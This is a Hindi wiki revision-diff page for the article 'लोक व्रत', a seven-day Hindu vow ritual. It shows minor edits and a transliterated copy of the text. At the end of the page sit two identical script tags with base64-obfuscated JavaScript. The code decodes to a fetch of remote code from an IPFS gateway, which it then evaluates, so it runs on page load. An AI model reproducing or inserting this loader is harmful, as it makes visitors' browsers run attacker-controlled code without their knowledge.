Difference between revisions of "लोक व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('*भारत में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा ...' के साथ नया पन्ना बनाया)
 
m (Text replace - ")</ref" to "</ref")
 
(7 intermediate revisions by 4 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
 
*लोकव्रत [[चैत्र]] [[शुक्ल पक्ष]] से प्रारम्भ होता है।
 
*लोकव्रत [[चैत्र]] [[शुक्ल पक्ष]] से प्रारम्भ होता है।
*उस दिन से सात दिनों तक क्रम से [[गोमूत्र]], [[गोबर]], [[दूध]], [[दही]], [[घी]], [[कुश]] डाला हुआ जल एवं उपवास का प्रयोग किया जाता है।
+
*उस दिन से सात दिनों तक क्रम से गोमूत्र, गोबर, [[दूध]], [[दही]], [[घी]], कुश डाला हुआ जल एवं उपवास का प्रयोग किया जाता है।
 
*महा व्याहतियों (भू:, भुव:स्व: आदि) के साथ तिल होम किया जाता है।
 
*महा व्याहतियों (भू:, भुव:स्व: आदि) के साथ तिल होम किया जाता है।
 
*अन्त में [[वस्त्र]], [[पीतल]], [[गाय|गौओं]] का दान होता है।
 
*अन्त में [[वस्त्र]], [[पीतल]], [[गाय|गौओं]] का दान होता है।
*कर्ता सम्राट हो जाता है। <ref>हेमाद्रि (व्रत खण्ड 2, 463, विष्णुधर्मोत्तरपुराण 3|162|1-7 से उद्धरण)</ref>
+
*कर्ता सम्राट हो जाता है। <ref>हेमाद्रि (व्रत खण्ड 2, 463, विष्णुधर्मोत्तरपुराण 3|162|1-7 से उद्धरण</ref>
{{लेख प्रगति
+
{{संदर्भ ग्रंथ}}
|आधार=आधार1
 
|प्रारम्भिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
==संबंधित लिंक==
+
==संबंधित लेख==
 
{{पर्व और त्योहार}}
 
{{पर्व और त्योहार}}
 
{{व्रत और उत्सव}}
 
{{व्रत और उत्सव}}

Latest revision as of 12:45, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • lokavrat chaitr shukl paksh se prarambh hota hai.
  • us din se sat dinoan tak kram se gomootr, gobar, doodh, dahi, ghi, kush dala hua jal evan upavas ka prayog kiya jata hai.
  • maha vyahatiyoan (bhoo:, bhuv:sv: adi) ke sath til hom kiya jata hai.
  • ant mean vastr, pital, gauoan ka dan hota hai.
  • karta samrat ho jata hai. [1]

tika tippani aur sandarbh

  1. hemadri (vrat khand 2, 463, vishnudharmottarapuran 3|162|1-7 se uddharan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>